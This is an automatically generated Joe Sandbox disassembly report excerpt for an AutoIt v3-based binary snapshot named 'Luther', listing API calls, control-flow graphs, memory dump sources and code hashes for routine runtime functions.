                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00E33709,?,?), ref: 00E337A3
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E337C6
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E33709,?,?), ref: 00E337D1
                                                                                                          • CreatePopupMenu.USER32 ref: 00E337E5
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00E33806
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated
                                                                                                          • API String ID: 129472671-2362178303
                                                                                                          • Opcode ID: 2d250da941bb5b20a311a419777b3e6c33f84d76ea4459e955fb65e36d47cbb3
                                                                                                          • Instruction ID: 3f3dcbf7409d86374a974ef16ddc59fdc9c13263c92e7aa2747ddda75d4bbb27
                                                                                                          • Opcode Fuzzy Hash: 2d250da941bb5b20a311a419777b3e6c33f84d76ea4459e955fb65e36d47cbb3
                                                                                                          • Instruction Fuzzy Hash: C941E3F1204248BADB642B3CDC4DFBA3EA9FB04305F14622BF505B51A1CA769B45F671

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 860 e690c5-e690d5 861 e690d7-e690ea call e5f636 call e5f649 860->861 862 e690ef-e690f1 860->862 878 e69471 861->878 864 e690f7-e690fd 862->864 865 e69459-e69466 call e5f636 call e5f649 862->865 864->865 868 e69103-e6912e 864->868 883 e6946c call e62b5c 865->883 868->865 871 e69134-e6913d 868->871 874 e69157-e69159 871->874 875 e6913f-e69152 call e5f636 call e5f649 871->875 876 e69455-e69457 874->876 877 e6915f-e69163 874->877 875->883 882 e69474-e69479 876->882 877->876 881 e69169-e6916d 877->881 878->882 881->875 885 e6916f-e69186 881->885 883->878 888 e691a3-e691ac 885->888 889 e69188-e6918b 885->889 893 e691ae-e691c5 call e5f636 call e5f649 call e62b5c 888->893 894 e691ca-e691d4 888->894 891 e69195-e6919e 889->891 892 e6918d-e69193 889->892 897 e6923f-e69259 891->897 892->891 892->893 926 e6938c 893->926 895 e691d6-e691d8 894->895 896 e691db-e691dc call e63b93 894->896 895->896 904 e691e1-e691f9 call e62d38 * 2 896->904 899 e6925f-e6926f 897->899 900 e6932d-e69336 call e6fc1b 897->900 899->900 903 e69275-e69277 899->903 913 e69338-e6934a 900->913 914 e693a9 900->914 903->900 907 e6927d-e692a3 903->907 930 e69216-e6923c call e697a4 904->930 931 e691fb-e69211 call e5f649 call e5f636 904->931 907->900 911 e692a9-e692bc 907->911 911->900 916 e692be-e692c0 911->916 913->914 919 e6934c-e6935b GetConsoleMode 913->919 918 e693ad-e693c5 ReadFile 914->918 916->900 921 e692c2-e692ed 916->921 923 e693c7-e693cd 918->923 924 e69421-e6942c GetLastError 918->924 919->914 925 e6935d-e69361 919->925 921->900 929 e692ef-e69302 921->929 923->924 934 e693cf 923->934 932 e69445-e69448 924->932 933 e6942e-e69440 call e5f649 call e5f636 924->933 925->918 927 e69363-e6937d ReadConsoleW 925->927 928 e6938f-e69399 call e62d38 926->928 935 e6939e-e693a7 927->935 936 e6937f GetLastError 927->936 928->882 929->900 940 e69304-e69306 929->940 930->897 931->926 937 e69385-e6938b call e5f613 932->937 938 e6944e-e69450 932->938 933->926 944 e693d2-e693e4 934->944 935->944 936->937 937->926 938->928 940->900 947 e69308-e69328 940->947 944->928 951 e693e6-e693ea 944->951 947->900 952 e69403-e6940e 951->952 953 e693ec-e693fc call e68de1 951->953 959 e69410 call e68f31 952->959 960 e6941a-e6941f call e68c21 952->960 965 e693ff-e69401 953->965 966 e69415-e69418 959->966 960->966 965->928 966->965
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 34bccf4ce92ecd314a4601d9caa9634b9724cec55a51db4f15c23b938e1be8cc
                                                                                                          • Instruction ID: da15a0f2a1844184ac1abc37fd65096f90ccc431be4f6c440bc8a507d288043a
                                                                                                          • Opcode Fuzzy Hash: 34bccf4ce92ecd314a4601d9caa9634b9724cec55a51db4f15c23b938e1be8cc
                                                                                                          • Instruction Fuzzy Hash: 6DC10370984249AFCF11DFA8E884BADBBF9BF09354F146159E910BB393C7318942CB60

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1004 e335b3-e33623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E335E1
                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E33602
                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E33616
                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E3361F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateShow
                                                                                                          • String ID: AutoIt v3$edit
                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                          • Opcode ID: bff0aa17a1034b57ff74d642969c56a09782305242267947282e879b9a82835c
                                                                                                          • Instruction ID: cec529b316e04a2673d71ee103af34877468aa6ba17f4291e555865188706813
                                                                                                          • Opcode Fuzzy Hash: bff0aa17a1034b57ff74d642969c56a09782305242267947282e879b9a82835c
                                                                                                          • Instruction Fuzzy Hash: 18F0DA716443987AEB7157176C0DF373EBDE7C6F50B00102EB904A7160D6BB1856EAB0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E75287
                                                                                                            • Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E36299
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                          • String ID: Line %d: $AutoIt -
                                                                                                          • API String ID: 2289894680-4094128768
                                                                                                          • Opcode ID: 272d08ce0fb865864e55fa54402ebaad638e7c46d71618c71fa71a97a5a59073
                                                                                                          • Instruction ID: f66584de270a7a2f072342992383ab43f49b163f3c7512d4fb8d8a6e9998bca7
                                                                                                          • Opcode Fuzzy Hash: 272d08ce0fb865864e55fa54402ebaad638e7c46d71618c71fa71a97a5a59073
                                                                                                          • Instruction Fuzzy Hash: F141B571408304AAC750EB30DC49EDFBBECAF45314F00A92EF599A20A1EF759649C792

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1056 e68a2e-e68a42 call e65737 1059 e68a44-e68a46 1056->1059 1060 e68a48-e68a50 1056->1060 1061 e68a96-e68ab6 call e656a6 1059->1061 1062 e68a52-e68a59 1060->1062 1063 e68a5b-e68a5e 1060->1063 1072 e68ac4 1061->1072 1073 e68ab8-e68ac2 call e5f613 1061->1073 1062->1063 1065 e68a66-e68a7a call e65737 * 2 1062->1065 1066 e68a60-e68a64 1063->1066 1067 e68a7c-e68a8c call e65737 CloseHandle 1063->1067 1065->1059 1065->1067 1066->1065 1066->1067 1067->1059 1076 e68a8e-e68a94 GetLastError 1067->1076 1078 e68ac6-e68ac9 1072->1078 1073->1078 1076->1061
                                                                                                          APIs
                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,OV,00E6894C,?,00EF9CE8,0000000C,00E689AB,?,OV,?,00E7564F), ref: 00E68A84
                                                                                                          • GetLastError.KERNEL32 ref: 00E68A8E
                                                                                                          • __dosmaperr.LIBCMT ref: 00E68AB9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                          • String ID: OV
                                                                                                          • API String ID: 2583163307-2262073888
                                                                                                          • Opcode ID: ecbd8622d87144562da8e858aa66532635aa7e0829598c8bbfa17144c931716b
                                                                                                          • Instruction ID: cd48859d383580cd5f4220b3f9852cac1a4f93c003133529c4f396c768d85310
                                                                                                          • Opcode Fuzzy Hash: ecbd8622d87144562da8e858aa66532635aa7e0829598c8bbfa17144c931716b
                                                                                                          • Instruction Fuzzy Hash: A8018E337851605AC66063B4BD45B7E27C55B917F8F25232BFD14BB1C2DF319C814180

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1081 e358cb-e358d6 1082 e35948-e3594a 1081->1082 1083 e358d8-e358dd 1081->1083 1085 e3593b-e3593e 1082->1085 1083->1082 1084 e358df-e358f7 RegOpenKeyExW 1083->1084 1084->1082 1086 e358f9-e35918 RegQueryValueExW 1084->1086 1087 e3591a-e35925 1086->1087 1088 e3592f-e3593a RegCloseKey 1086->1088 1089 e35927-e35929 1087->1089 1090 e3593f-e35946 1087->1090 1088->1085 1091 e3592d 1089->1091 1090->1091 1091->1088
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E358BE,SwapMouseButtons,00000004,?), ref: 00E358EF
                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E358BE,SwapMouseButtons,00000004,?), ref: 00E35910
                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E358BE,SwapMouseButtons,00000004,?), ref: 00E35932
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Control Panel\Mouse
                                                                                                          • API String ID: 3677997916-824357125
                                                                                                          • Opcode ID: 0f168b642142caedf028aa1f426e9b7fd97fde36e4f632ba680463129661e5d2
                                                                                                          • Instruction ID: f0c040a5c1f4bc4ddf704567e97302c3d160af489f905f058fa2d4c4b9c12c75
                                                                                                          • Opcode Fuzzy Hash: 0f168b642142caedf028aa1f426e9b7fd97fde36e4f632ba680463129661e5d2
                                                                                                          • Instruction Fuzzy Hash: 9C115AB6510618FFDB218F69CC89EEEBBB9EF40764F105469F811E7210E2329E45D760
                                                                                                          Strings
                                                                                                          • Variable must be of type 'Object'., xrefs: 00E848C6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Variable must be of type 'Object'.
                                                                                                          • API String ID: 0-109567571
                                                                                                          • Opcode ID: 204e12612f4b87c9e9216d081fd3b85bb8dc251dde952b2a7bbfadb9b9cb7bf5
                                                                                                          • Instruction ID: 5904ae7f6393b99739c2320fa5c92ea0086e8292c1fbeeafee73954fdfce3deb
                                                                                                          • Opcode Fuzzy Hash: 204e12612f4b87c9e9216d081fd3b85bb8dc251dde952b2a7bbfadb9b9cb7bf5
                                                                                                          • Instruction Fuzzy Hash: 5EC27871E006058FCB24DF98C884AADBBF1FF09314F24956AE909BB3A1D775AD41CB91
                                                                                                          APIs
                                                                                                          • __Init_thread_footer.LIBCMT ref: 00E43006
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Init_thread_footer
                                                                                                          • String ID: CALL$bn
                                                                                                          • API String ID: 1385522511-1920074456
                                                                                                          • Opcode ID: 8c4da2f8cc5b889291559f9af5125ea8ed33ab9a85ffc384992cc8dd24167a84
                                                                                                          • Instruction ID: 836f3f53e122cd032dfe1617ae13632f4c980eb1c80095fb866b6b5d7c293136
                                                                                                          • Opcode Fuzzy Hash: 8c4da2f8cc5b889291559f9af5125ea8ed33ab9a85ffc384992cc8dd24167a84
                                                                                                          • Instruction Fuzzy Hash: 5F22BD706082019FC714DF24D880B6AFBF1BF89314F64695DF99AAB3A2D731E945CB42
                                                                                                          APIs
                                                                                                          • __Init_thread_footer.LIBCMT ref: 00E415F2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Init_thread_footer
                                                                                                          • String ID:
                                                                                                          • API String ID: 1385522511-0
                                                                                                          • Opcode ID: 8be399aaa315e44a3d6bd516cf5f116b137dbf7a53c782bccefc257e20a11780
                                                                                                          • Instruction ID: 8c347867e502e2fda285f168d0a85f0b4f0052b9fbd258da1fdaff490135fcb0
                                                                                                          • Opcode Fuzzy Hash: 8be399aaa315e44a3d6bd516cf5f116b137dbf7a53c782bccefc257e20a11780
                                                                                                          • Instruction Fuzzy Hash: CAB29C74A08301CFCB24DF14E480A2AB7E1BF99304F14596DFA8AAB351D771ED45DB92
                                                                                                          APIs
                                                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00E7413B
                                                                                                            • Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871
                                                                                                            • Part of subcall function 00E33A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E33A76
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                          • String ID: X$`u
                                                                                                          • API String ID: 779396738-2693526198
                                                                                                          • Opcode ID: 2b02cff1d7b55ebc63fb869369e84e05a2fe6b78fc75625567249cafa77f01ce
                                                                                                          • Instruction ID: b342904c96abe18f6003738a43115cb7b98d42c5bd22335702aeb2076f3a81ea
                                                                                                          • Opcode Fuzzy Hash: 2b02cff1d7b55ebc63fb869369e84e05a2fe6b78fc75625567249cafa77f01ce
                                                                                                          • Instruction Fuzzy Hash: EC215171A0425C9BDB019FA8C809BEE7FF8AF49314F009059E545B7281DBB59A89CFA1
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00E509D8
                                                                                                            • Part of subcall function 00E53614: RaiseException.KERNEL32(?,?,?,00E509FA,?,00000000,?,?,?,?,?,?,00E509FA,00000000,00EF9758,00000000), ref: 00E53674
                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00E509F5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                                                          • String ID: Unknown exception
                                                                                                          • API String ID: 3476068407-410509341
                                                                                                          • Opcode ID: 5b2da3c4d5492ebc64d83443aa35fed9a9dd403757718736eb56a0898753291b
                                                                                                          • Instruction ID: 6e1efb37fb7809a01c73dbab8c305f71f7033afde4cdf02bcc5353e9d1d4ac30
                                                                                                          • Opcode Fuzzy Hash: 5b2da3c4d5492ebc64d83443aa35fed9a9dd403757718736eb56a0898753291b
                                                                                                          • Instruction Fuzzy Hash: D1F0283480070C778B00BAB4DC169AE77BC5E40355B606825FD14B65E3FB70E61DC6C0
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00EB8D52
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00EB8D59
                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 00EB8F3A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 146820519-0
                                                                                                          • Opcode ID: e795016de8fcbde6bb3a32c34682136748bbb942e399acd9578ed89862a3bc21
                                                                                                          • Instruction ID: 6d79704ee61b941bf0efbbebb31b203dc47c539978c455d3c3df6cf680b99673
                                                                                                          • Opcode Fuzzy Hash: e795016de8fcbde6bb3a32c34682136748bbb942e399acd9578ed89862a3bc21
                                                                                                          • Instruction Fuzzy Hash: 28127C71A083019FC714CF28C584BAABBE5FF84318F14995DE889AB352DB31E945CF92
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E332AF
                                                                                                            • Part of subcall function 00E3327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E332B7
                                                                                                            • Part of subcall function 00E3327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E332C2
                                                                                                            • Part of subcall function 00E3327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E332CD
                                                                                                            • Part of subcall function 00E3327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E332D5
                                                                                                            • Part of subcall function 00E3327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E332DD
                                                                                                            • Part of subcall function 00E33205: RegisterWindowMessageW.USER32(00000004,?,00E32964), ref: 00E3325D
                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E32A0A
                                                                                                          • OleInitialize.OLE32 ref: 00E32A28
                                                                                                          • CloseHandle.KERNEL32(00000000,00000000), ref: 00E73A0D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1986988660-0
                                                                                                          • Opcode ID: dbc5d7f08a3dbc5a20b87d56747a701cd5029ccd138f3753b93757379e51676e
                                                                                                          • Instruction ID: 9c85b881b6ed6994b86e789851e7f1ff51d117fa1c9a6a6cfc63db4b585abd63
                                                                                                          • Opcode Fuzzy Hash: dbc5d7f08a3dbc5a20b87d56747a701cd5029ccd138f3753b93757379e51676e
                                                                                                          • Instruction Fuzzy Hash: E97191B89052088FC7C8DF79AD6D6257AE0BB88304758912ED409E73B2EB714545FF78
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E361A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E36299
                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00E4FD36
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E4FD45
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E8FE33
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
